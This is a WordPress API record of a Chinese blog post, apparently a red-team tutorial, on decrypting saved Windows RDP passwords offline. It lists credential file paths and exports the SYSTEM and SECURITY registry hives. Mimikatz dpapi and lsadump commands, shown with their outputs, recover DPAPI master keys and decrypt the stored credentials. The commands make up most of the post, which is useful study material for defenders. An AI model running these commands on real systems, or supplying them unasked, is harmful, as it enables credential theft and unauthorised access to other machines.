{"id":903,"date":"2025-04-06T13:51:44","date_gmt":"2025-04-06T05:51:44","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=903"},"modified":"2025-04-06T22:13:11","modified_gmt":"2025-04-06T14:13:11","slug":"rdpcre_dec","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/04\/06\/rdpcre_dec\/","title":{"rendered":"\u79bb\u7ebf\u89e3\u5bc6RDP\u5bc6\u7801\u51ed\u636e"},"content":{"rendered":"<h3>\u79bb\u7ebf\u89e3\u5bc6RDP\u5bc6\u7801\u51ed\u636e<\/h3>\n<p>\u6ce8\u610f\uff1a<\/p>\n<ul>\n<li>\u5b58\u50a8rdp\u8fde\u63a5\u4fe1\u606f\u7684\u51ed\u636e\u5927\u5c0f\u57fa\u672c\u90fd\u662f1KB<\/li>\n<\/ul>\n<h4>step1 \u67e5\u770bRDP\u5bc6\u7801\u51ed\u636e<\/h4>\n<p>\u7cfb\u7edfRDP\u5bc6\u7801\u51ed\u636e\u5b58\u653e\u4f4d\u7f6e<\/p>\n<pre><code class=\"language-text\">C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\<\/code><\/pre>\n<p>\u7528\u6237RDP\u5bc6\u7801\u51ed\u636e\u5b58\u653e\u4f4d\u7f6e<\/p>\n<pre><code class=\"language-text\">C:\\Users\\[user]\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\[user]\\AppData\\Roaming\\Microsoft\\Credentials\\<\/code><\/pre>\n<h4>step2 \u83b7\u53d6guidMasterKey<\/h4>\n<p>\u901a\u8fc7mimikatz\u83b7\u53d6RDP\u5bc6\u7801\u51ed\u636e\u5bf9\u5e94\u7684<code>guidMasterKey<\/code>\uff0c\u8fd9\u91cc\u5206\u522b\u7528\u7cfb\u7edf\u548c\u7528\u6237\u7684RDP\u5bc6\u7801\u51ed\u636e\u6765\u6f14\u793a<\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;dpapi::cred \/in:DFBE70A7E5CC19A398EBF1B96859CE5D&quot; exit\n\/\/ \u7cfb\u7edfRDP\u5bc6\u7801\u51ed\u636e<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_1.png\" alt=\"RDPCre_dec_1\" \/><\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;dpapi::cred \/in:14396336784B72E4294497641A22A484&quot; exit\n\/\/ \u7528\u6237RDP\u5bc6\u7801\u51ed\u636e<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_2.png\" alt=\"RDPCre_dec_2\" \/><\/p>\n<h4>step3 \u83b7\u53d6masterkey<\/h4>\n<p>\u6839\u636e\u662f\u7cfb\u7edf\u8fd8\u662f\u7528\u6237RDP\u5bc6\u7801\u51ed\u636e\uff0c\u53bb\u627e\u5bf9\u5e94\u8eab\u4efd\u51ed\u8bc1 masterkey<\/p>\n<h5>\u7cfb\u7edf MasterKey file<\/h5>\n<p>\u7cfb\u7edf MasterKey file\u5b58\u653e\u4f4d\u7f6e\u5982\u4e0b<\/p>\n<pre><code class=\"language-text\">%WINDIR%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\n\u4f8b\u5982\uff1aC:\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User<\/code><\/pre>\n<p>\u5bfc\u51fa system \u548c security<\/p>\n<pre><code class=\"language-text\">reg save hklm\\system SYSTEM.hive\nreg save hklm\\security SECURITY.hive<\/code><\/pre>\n<p>\u901a\u8fc7mimikatz\u83b7\u53d6DPAPI_SYSTEM\u4e2d\u7684user hash<\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;lsadump::secrets \/system:SYSTEM.hive \/security:SECURITY.hive&quot; exit<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_3.png\" alt=\"RDPCre_dec_3\" \/><\/p>\n<p>\u6839\u636euser hash\u83b7\u53d6<code>masterkey<\/code><\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;dpapi::masterkey \/in:461706d7-0e17-40cd-bb2a-20584c2677d0 \/system:8be2afb7cb82c63b74770e61b5d4938573ad145f&quot; exit<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_4.png\" alt=\"RDPCre_dec_4\" \/><\/p>\n<pre><code class=\"language-text\">0cbf703b58cde2f51a9a958a4263facebef4e12ea4a66f7fd3b63e92c9cab562c911ac5f1cb90e24efb14e11eb9e74f0c619ab871fa2a023e18f753235c1ad4f<\/code><\/pre>\n<h5>\u7528\u6237 MasterKey file<\/h5>\n<p>\u7528\u6237 MasterKey file\u5b58\u653e\u4f4d\u7f6e\u5982\u4e0b<\/p>\n<pre><code class=\"language-text\">%APPDATA%\\Microsoft\\Protect\\%SID%\n\u4f8b\u5982\uff1aC:\\Users\\[user]\\AppData\\Roaming\\Microsoft\\Protect\\[SID]<\/code><\/pre>\n<p>\u627e\u5230\u5bf9\u5e94\u8eab\u4efd\u51ed\u8bc1\u5e76\u8bb0\u5f55 SID \u6587\u4ef6\u540d<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_5.png\" alt=\"RDPCre_dec_5\" \/><\/p>\n<p>\u901a\u8fc7mimikatz\u914d\u5408\u7528\u6237\u5bc6\u7801\u83b7\u53d6<code>masterkey<\/code><\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;dpapi::masterkey \/in:61e93ed3-5ca2-4e98-a27b-b8a09fcf618d \/sid:S-1-5-21-1507239155-486581747-1996177333-1000 \/password:Jo9657! \/protected&quot; exit<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_6.png\" alt=\"RDPCre_dec_6\" \/><\/p>\n<pre><code class=\"language-text\">75690187db3d7b10dbad020d97ee3557178b86d34736f60fed190de957366d803c7c46a563bfa08f345a70f7b77578f821c2cc38f5b182c1cfeb7a6b84834125<\/code><\/pre>\n<h4>step4 \u89e3\u5bc6pbData<\/h4>\n<p>\u6700\u540e\u7528<code>masterkey<\/code>\u89e3\u5bc6<code>pbData<\/code>\u6570\u636e<\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;dpapi::cred \/in:DFBE70A7E5CC19A398EBF1B96859CE5D \/masterkey:0cbf703b58cde2f51a9a958a4263facebef4e12ea4a66f7fd3b63e92c9cab562c911ac5f1cb90e24efb14e11eb9e74f0c619ab871fa2a023e18f753235c1ad4f&quot; exit<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_7.png\" alt=\"RDPCre_dec_7\" \/><\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;dpapi::cred \/in:14396336784B72E4294497641A22A484 \/masterkey:75690187db3d7b10dbad020d97ee3557178b86d34736f60fed190de957366d803c7c46a563bfa08f345a70f7b77578f821c2cc38f5b182c1cfeb7a6b84834125&quot; exit<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_8.png\" alt=\"RDPCre_dec_8\" \/><\/p>\n<h4>\u4e00\u628a\u68ad<\/h4>\n<p>\u5982\u679c\u5728\u672c\u5730\u6216\u8005\u6709\u4eff\u771f\u73af\u5883\u53ef\u4ee5\u76f4\u63a5\u4e0a<a href=\"https:\/\/www.nirsoft.net\/utils\/network_password_recovery.html\">\u5de5\u5177<\/a><\/p>\n<p>\u8fd0\u884c\u81ea\u52a8\u89e3\u5bc6\u672c\u5730\u51ed\u636e<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_9.png\" alt=\"RDPCre_dec_9\" \/><\/p>\n<div class=\"clearfix\"><\/div>","protected":false},"excerpt":{"rendered":"<p>\u79bb\u7ebf\u89e3\u5bc6RDP\u5bc6\u7801\u51ed\u636e \u6ce8\u610f\uff1a \u5b58\u50a8rdp\u8fde\u63a5\u4fe1\u606f\u7684\u51ed\u636e\u5927\u5c0f\u57fa\u672c\u90fd\u662f1KB step1 \u67e5\u770bRDP\u5bc6\u7801\u51ed\u636e \u7cfb [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-903","post","type-post","status-publish","format-standard","hentry","category-misc"],"views":827,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/903","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=903"}],"version-history":[{"count":3,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/903\/revisions"}],"predecessor-version":[{"id":906,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/903\/revisions\/906"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=903"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=903"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=903"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}